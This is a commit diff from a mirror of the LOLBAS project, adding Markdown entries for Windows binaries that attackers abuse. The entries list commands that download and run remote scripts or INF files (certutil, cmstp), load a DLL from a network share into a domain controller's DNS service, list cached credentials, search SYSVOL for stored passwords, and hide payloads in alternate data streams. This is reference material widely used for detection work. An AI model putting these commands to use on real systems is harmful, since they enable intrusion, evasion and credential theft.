public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-26 20:22:24 +02:00
Code Issues Projects Releases Wiki Activity

MD files generate from Script, and adjustments to readme

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-14 15:48:52 +02:00
parent eef9e78be8
commit c949e100bd
221 changed files with 2729 additions and 158 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
OSBinaries/Atbroker.exe.md Normal file
View File

@@ -0,0 +1,18 @@
## Atbroker.exe
* Functions: Execute
```
ATBroker.exe /start malware
Start a registered Assistive Technology (AT).
```
* Resources:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
* Full path:
* C:\Windows\System32\Atbroker.exe
* C:\Windows\SysWOW64\Atbroker.exe
* Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.

20
OSBinaries/Atbroker.yml
View File

@@ -1,20 +0,0 @@
---
Name: Atbroker.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Full Path:
- C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe
Code Sample: []
Detection: []
Resources:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Notes: >
Thanks to Adam - @hexacorn
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.

16
OSBinaries/Bash.exe.md Normal file
View File

@@ -0,0 +1,16 @@
## Bash.exe
* Functions: Execute
```
bash.exe -c calc.exe
Execute calc.exe.
```
* Resources:
*
* Full path:
* ?
* Notes: Thanks to ?

17
OSBinaries/Bash.yml
View File

@@ -1,17 +0,0 @@
---
Name: Bash.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: bash.exe -c calc.exe
Description: Execute calc.exe.
Full Path:
- '?'
Code Sample: []
Detection: []
Resources:
- ''
Notes: Thanks to ?

40
OSBinaries/Bitsadmin.exe.md Normal file
View File

@@ -0,0 +1,40 @@
## Bitsadmin.exe
* Functions: Execute, Download, Copy, Read ADS
```
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
```
* Resources:
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
* https://www.youtube.com/watch?v=_8xJaaQlpBo
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\Windows\System32\bitsadmin.exe
* c:\Windows\SysWOW64\bitsadmin.exe
* Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe

36
OSBinaries/Bitsadmin.yml
View File

@@ -1,36 +0,0 @@
---
Name: Bitsadmin.exe
Description: Execute, Download, Copy, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Full Path:
- c:\Windows\System32\bitsadmin.exe
- c:\Windows\SysWOW64\bitsadmin.exe
Code Sample: []
Detection: []
Resources:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Slide 53
- https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe

26
OSBinaries/Certutil.exe.md Normal file
View File

@@ -0,0 +1,26 @@
## Certutil.exe
* Functions: Download, Add ADS, Decode, Encode
```
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Commands to encode and decode a file using Base64.
```
* Resources:
* https://twitter.com/Moriarty_Meng/status/984380793383370752
* https://twitter.com/mattifestation/status/620107926288515072
* Full path:
* c:\windows\system32\certutil.exe
* c:\windows\sysWOW64\certutil.exe
* Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016

25
OSBinaries/Certutil.yml
View File

@@ -1,25 +0,0 @@
---
Name: Certutil.exe
Description: Download, Add ADS, Decode, Encode
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Command: |
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Description: Commands to encode and decode a file using Base64.
Full Path:
- c:\windows\system32\certutil.exe
- c:\windows\sysWOW64\certutil.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016

17
OSBinaries/Cmdkey.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Cmdkey.exe
* Functions: Credentials
```
cmdkey /list
List cached credentials.
```
* Resources:
* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
* Full path:
* c:\windows\system32\cmdkey.exe
* c:\windows\sysWOW64\cmdkey.exe
* Notes:

18
OSBinaries/Cmdkey.yml
View File

@@ -1,18 +0,0 @@
---
Name: Cmdkey.exe
Description: Credentials
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmdkey /list
Description: List cached credentials.
Full Path:
- c:\windows\system32\cmdkey.exe
- c:\windows\sysWOW64\cmdkey.exe
Code Sample: []
Detection: []
Resources:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Notes: ''

25
OSBinaries/Cmstp.exe.md Normal file
View File

@@ -0,0 +1,25 @@
## Cmstp.exe
* Functions: Execute, UACBypass
```
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
* Resources:
* https://twitter.com/NickTyrer/status/958450014111633408
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
* https://github.com/hfiref0x/UACME
* Full path:
* C:\Windows\system32\cmstp.exe
* C:\Windows\sysWOW64\cmstp.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer

26
OSBinaries/Cmstp.yml
View File

@@ -1,26 +0,0 @@
---
Name: Cmstp.exe
Description: Execute, UACBypass
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Full Path:
- C:\Windows\system32\cmstp.exe
- C:\Windows\sysWOW64\cmstp.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
(UAC Bypass)
- https://github.com/hfiref0x/UACME
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer

20
OSBinaries/Control.exe.md Normal file
View File

@@ -0,0 +1,20 @@
## Control.exe
* Functions: Execute, Read ADS
```
control.exe c:\windows\tasks\file.txt:evil.dll
Execute evil.dll which is stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
* https://twitter.com/bohops/status/955659561008017409
* Full path:
* C:\Windows\system32\control.exe
* C:\Windows\sysWOW64\control.exe
* Notes: Thanks to Jimmy - @bohops

21
OSBinaries/Control.yml
View File

@@ -1,21 +0,0 @@
---
Name: Control.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Full Path:
- 'C:\Windows\system32\control.exe '
- 'C:\Windows\sysWOW64\control.exe '
Code Sample: []
Detection: []
Resources:
- https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
- https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
- https://twitter.com/bohops/status/955659561008017409
Notes: Thanks to Jimmy - @bohops

21
OSBinaries/Csc.exe.md Normal file
View File

@@ -0,0 +1,21 @@
## Csc.exe
* Functions: Compile
```
csc -out:My.exe File.cs
Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
csc -target:library File.cs
```
* Resources:
* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
*
* Full path:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
* Notes: Thanks to ?

21
OSBinaries/Csc.yml
View File

@@ -1,21 +0,0 @@
---
Name: Csc.exe
Description: Compile
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: csc -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
- Command: csc -target:library File.cs
Description: ''
Full Path:
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code Sample: []
Detection: []
Resources:
- https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
- ''
Notes: Thanks to ?

18
OSBinaries/Cscript.exe.md Normal file
View File

@@ -0,0 +1,18 @@
## Cscript.exe
* Functions: Execute, Read ADS
```
cscript c:\ads\file.txt:script.vbs
Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* c:\windows\system32\cscript.exe
* c:\windows\sysWOW64\cscript.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

19
OSBinaries/Cscript.yml
View File

@@ -1,19 +0,0 @@
---
Name: Cscript.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Full Path:
- c:\windows\system32\cscript.exe
- c:\windows\sysWOW64\cscript.exe
Code Sample: []
Detection: []
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Oddvar Moe - @oddvarmoe

19
OSBinaries/Dfsvc.exe.md Normal file
View File

@@ -0,0 +1,19 @@
## Dfsvc.exe
* Functions: Execute
```
Missing Example
```
* Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Dfsvc.yml
View File

@@ -1,19 +0,0 @@
---
Name: Dfsvc.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Missing Example
Description: ''
Full Path:
- 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe '
Code Sample: []
Detection: []
Resources:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
Notes: Thanks to Casey Smith - @subtee

20
OSBinaries/Diskshadow.exe.md Normal file
View File

@@ -0,0 +1,20 @@
## Diskshadow.exe
* Functions: Execute, Dump NTDS.dit
```
diskshadow.exe /s c:\test\diskshadow.txt
Execute commands using diskshadow.exe from a prepared diskshadow script.
diskshadow> exec calc.exe
Execute a calc.exe using diskshadow.exe.
```
* Resources:
* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
* Full path:
* c:\windows\system32\diskshadow.exe
* c:\windows\sysWOW64\diskshadow.exe
* Notes: Thanks to Jimmy - @bohops

20
OSBinaries/Diskshadow.yml
View File

@@ -1,20 +0,0 @@
---
Name: Diskshadow.exe
Description: Execute, Dump NTDS.dit
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
- Command: diskshadow> exec calc.exe
Description: Execute a calc.exe using diskshadow.exe.
Full Path:
- c:\windows\system32\diskshadow.exe
- c:\windows\sysWOW64\diskshadow.exe
Code Sample: []
Detection: []
Resources:
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Notes: Thanks to Jimmy - @bohops

27
OSBinaries/Dns.yml
View File

@@ -1,27 +0,0 @@
---
Name: Dnscmd.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.'
Full Path:
- c:\windows\system32\Dnscmd.exe
- c:\windows\sysWOW64\Dnscmd.exe
Code Sample: []
Detection: []
Resources:
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
- https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
- https://twitter.com/Hexacorn/status/994000792628719618
- http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Notes: |
This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
Thanks to Shay Ber - ?,
Dimitrios Slamaris - @dim0x69,
Nikhil SamratAshok,
Mittal - @nikhil_mitt

26
OSBinaries/Dnscmd.exe.md Normal file
View File

@@ -0,0 +1,26 @@
## Dnscmd.exe
* Functions: Execute
```
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Adds a specially crafted DLL as a plug-in of the DNS Service.
```
* Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
* Full path:
* c:\windows\system32\Dnscmd.exe
* c:\windows\sysWOW64\Dnscmd.exe
* Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
Thanks to Shay Ber - ?,
Dimitrios Slamaris - @dim0x69,
Nikhil SamratAshok,
Mittal - @nikhil_mitt

32
OSBinaries/Esentutl.exe.md Normal file
View File

@@ -0,0 +1,32 @@
## Esentutl.exe
* Functions: Copy, Download, Write ADS, Read ADS
```
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Copies the source VBS file to the destination VBS file.
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Copies the source Alternate Data Stream (ADS) to the destination EXE.
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Copies the source EXE to the destination EXE file.
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Copies the source EXE to the destination EXE file
```
* Resources:
* https://twitter.com/egre55/status/985994639202283520
* Full path:
* c:\windows\system32\esentutl.exe
* c:\windows\sysWOW64\esentutl.exe
* Notes: Thanks to egre55 - @egre55

28
OSBinaries/Esentutl.yml
View File

@@ -1,28 +0,0 @@
---
Name: Esentutl.exe
Description: Copy, Download, Write ADS, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Description: Copies the source EXE to the destination EXE file.
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Description: Copies the source EXE to the destination EXE file
Full Path:
- c:\windows\system32\esentutl.exe
- c:\windows\sysWOW64\esentutl.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to egre55 - @egre55

24
OSBinaries/Expand.exe.md Normal file
View File

@@ -0,0 +1,24 @@
## Expand.exe
* Functions: Download, Copy, Add ADS
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
Copies source file to destination.
expand c:\ADS\file1.bat c:\ADS\file2.bat
Copies source file to destination.
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Copies source file to destination Alternate Data Stream (ADS).
```
* Resources:
* https://twitter.com/infosecn1nja/status/986628482858807297
* https://twitter.com/Oddvarmoe/status/986709068759949319
* Full path:
* c:\windows\system32\Expand.exe
* c:\windows\sysWOW64\Expand.exe
* Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe

23
OSBinaries/Expand.yml
View File

@@ -1,23 +0,0 @@
---
Name: Expand.exe
Description: Download, Copy, Add ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: 'Copies source file to destination.'
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
Description: 'Copies source file to destination.'
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
Full Path:
- c:\windows\system32\Expand.exe
- c:\windows\sysWOW64\Expand.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/infosecn1nja/status/986628482858807297
- https://twitter.com/Oddvarmoe/status/986709068759949319
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe

17
OSBinaries/Explorer.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Explorer.exe
* Functions: Execute
```
explorer.exe calc.exe
Executes calc.exe as a subprocess of explorer.exe.
```
* Resources:
* https://twitter.com/bohops/status/986984122563391488
* Full path:
* c:\windows\explorer.exe
* c:\windows\sysWOW64\explorer.exe
* Notes: Thanks to Jimmy - @bohops

18
OSBinaries/Explorer.yml
View File

@@ -1,18 +0,0 @@
---
Name: Explorer.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: explorer.exe calc.exe
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
Full Path:
- c:\windows\explorer.exe
- c:\windows\sysWOW64\explorer.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/bohops/status/986984122563391488
Notes: Thanks to Jimmy - @bohops

17
OSBinaries/Extexport.exe.md Normal file
View File

@@ -0,0 +1,17 @@
## Extexport.exe
* Functions: Execute
```
Extexport.exe c:\test foo bar
Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
```
* Resources:
* http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
* Full path:
* C:\Program Files\Internet Explorer\Extexport.exe
* C:\Program Files\Internet Explorer(x86)\Extexport.exe
* Notes: Thanks to Adam - @hexacorn

18
OSBinaries/Extexport.yml
View File

@@ -1,18 +0,0 @@
---
Name: Extexport.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: Extexport.exe c:\test foo bar
Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll'
Full Path:
- 'C:\Program Files\Internet Explorer\Extexport.exe '
- C:\Program Files\Internet Explorer(x86)\Extexport.exe
Code Sample: []
Detection: []
Resources:
- http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Notes: Thanks to Adam - @hexacorn

25
OSBinaries/Extrac32.exe.md Normal file
View File

@@ -0,0 +1,25 @@
## Extrac32.exe
* Functions: Add ADS, Download
```
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy the source file to the destination file and overwrite it.
```
* Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://twitter.com/egre55/status/985994639202283520
* Full path:
* c:\windows\system32\extrac32.exe
* c:\windows\sysWOW64\extrac32.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55

24
OSBinaries/Extrac32.yml
View File

@@ -1,24 +0,0 @@
---
Name: Extrac32.exe
Description: Add ADS, Download
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: 'Copy the source file to the destination file and overwrite it.'
Full Path:
- c:\windows\system32\extrac32.exe
- c:\windows\sysWOW64\extrac32.exe
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55

24
OSBinaries/Findstr.exe.md Normal file
View File

@@ -0,0 +1,24 @@
## Findstr.exe
* Functions: Add ADS, Search
```
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Search for stored password in Group Policy files stored on SYSVOL.
```
* Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\windows\system32\findstr.exe
* c:\windows\sysWOW64\findstr.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

23
OSBinaries/Findstr.yml
View File

@@ -1,23 +0,0 @@
---
Name: Findstr.exe
Description: Add ADS, Search
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
- Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Description: 'Search for stored password in Group Policy files stored on SYSVOL.'
Full Path:
- c:\windows\system32\findstr.exe
